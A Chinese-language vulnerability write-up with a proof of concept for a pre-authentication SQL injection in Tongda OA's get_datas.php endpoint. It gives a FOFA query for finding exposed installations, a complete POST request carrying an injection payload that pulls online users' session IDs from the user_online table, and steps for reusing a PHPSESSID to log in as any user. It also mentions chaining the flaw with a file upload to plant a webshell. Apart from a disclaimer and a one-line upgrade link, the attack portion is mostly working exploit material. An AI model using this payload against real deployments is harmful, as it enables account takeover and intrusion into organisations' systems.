通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]

通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

通达OA（Office Automation）是一款企业级协同办公软件，旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能，包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用，可以实现随时随地办公，提高工作效率和协作能力。同时，它还具备高度可定制性和扩展性，可以根据企业的实际需求进行定制开发，满足企业的个性化需求。通达OA广泛应用于各类企业，帮助企业实现数字化转型，提高管理效率和竞争力。

攻击者通过对某OA系统进行代码审计，找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句，对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞，上传webshell。

0x03 影响版本

通达OA（Office Automation）

0x04 漏洞环境

FOFA语法： app=“TDXK-通达OA”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （POST）

POST /general/reportshop/utils/get_datas.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1

3.复现

1.使用POST方式访问

/general/reportshop/utils/get_datas.php

payload为：

USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1**

2.通过获取到在线用户的Session，登录general/index.php 时替换里面的PHPSESSID值即可实现任意用户登录。

1,2步完成后直接回车，即可进入系统。

0x06 修复建议

目前官方已有可更新版本，建议受影响用户升级至最新版：

https://www.tongda2000.com/download/p2022.php